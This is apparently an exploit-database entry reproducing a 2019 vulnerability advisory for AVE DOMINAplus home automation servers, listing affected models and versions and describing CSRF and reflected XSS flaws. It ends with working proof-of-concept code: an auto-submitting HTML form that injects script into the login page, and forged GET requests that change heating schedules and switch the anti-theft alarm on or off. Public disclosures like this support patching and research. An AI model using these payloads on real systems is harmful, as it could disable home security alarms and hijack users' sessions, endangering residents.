108 lines
No EOL
4.1 KiB
Text
108 lines
No EOL
4.1 KiB
Text
# Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
|
|
# Date: 2019-12-30
|
|
# Author: LiquidWorm
|
|
# Vendor: AVE S.p.A.
|
|
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
|
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
|
# Advisory ID: ZSL-2019-5547
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
|
|
|
|
AVE DOMINAplus <=1.10.x CSRF/XSS Vulnerabilities
|
|
|
|
|
|
Vendor: AVE S.p.A.
|
|
Product web page: https://www.ave.it | https://www.domoticaplus.it
|
|
Affected version: Web Server Code 53AB-WBS - 1.10.62
|
|
Touch Screen Code TS01 - 1.0.65
|
|
Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
|
|
Touch Screen Code TS05 - 1.10.36
|
|
Models: 53AB-WBS
|
|
TS01
|
|
TS03V
|
|
TS04X-V
|
|
TS05N-V
|
|
App version: 1.10.77
|
|
App version: 1.10.65
|
|
App version: 1.10.64
|
|
App version: 1.10.62
|
|
App version: 1.10.60
|
|
App version: 1.10.52
|
|
App version: 1.10.52A
|
|
App version: 1.10.49
|
|
App version: 1.10.46
|
|
App version: 1.10.45
|
|
App version: 1.10.44
|
|
App version: 1.10.35
|
|
App version: 1.10.25
|
|
App version: 1.10.22
|
|
App version: 1.10.11
|
|
App version: 1.8.4
|
|
App version: TS1-1.0.65
|
|
App version: TS1-1.0.62
|
|
App version: TS1-1.0.44
|
|
App version: TS1-1.0.10
|
|
App version: TS1-1.0.9
|
|
|
|
Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
|
|
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
|
|
automation proposal that makes houses safer, more welcoming and optimized. In
|
|
fact, our home automation system introduces cutting-edge technologies, designed
|
|
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
|
|
and security and offers advanced supervision tools in order to learn how to
|
|
evaluate and reduce consumption through various solutions dedicated to energy
|
|
saving.
|
|
|
|
Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The
|
|
application allows users to perform certain actions via HTTP requests without
|
|
performing any validity checks to verify the requests. This can be exploited
|
|
to perform certain actions with administrative privileges if a logged-in user
|
|
visits a malicious web site. Input passed to several GET/POST parameters is not
|
|
properly sanitised before being returned to the user. This can be exploited to
|
|
execute arbitrary HTML and script code in a user's browser session in context
|
|
of an affected site.
|
|
|
|
Tested on: GNU/Linux 4.1.19-armv7-x7
|
|
GNU/Linux 3.8.13-bone50/bone71.1/bone86
|
|
Apache/2.4.7 (Ubuntu)
|
|
Apache/2.2.22 (Debian)
|
|
PHP/5.5.9-1ubuntu4.23
|
|
PHP/5.4.41-0+deb7u1
|
|
PHP/5.4.36-0+deb7u3
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2019-5547
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
|
|
|
|
|
|
06.10.2019
|
|
|
|
--
|
|
|
|
|
|
Reflected XSS in User and Password POST parameters in login.php:
|
|
--
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.10/login.php" method="POST">
|
|
<input type="hidden" name="cmd" value="doLogin" />
|
|
<input type="hidden" name="User" value=""><marquee>SLIDERS</marquee>" />
|
|
<input type="hidden" name="Password" value=""><script>confirm(251)</script>" />
|
|
<input type="hidden" name="btnLogin" value="Login" />
|
|
<input type="submit" value="Send" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
Example CSRF schedule temperature for day, afternoon, night: 19.0, 18.0, 15.0
|
|
--
|
|
GET /bridge.php?command=STC¶meter=25,1,1&dati=190,180,150,1454025386,85,-1433059328, HTTP/1.1
|
|
|
|
|
|
Example CSRF enable/disable alarm:
|
|
--
|
|
GET /antitheft.php?command=Attiva&codice=32&rnd=0.8815229032260505 HTTP/1.1 |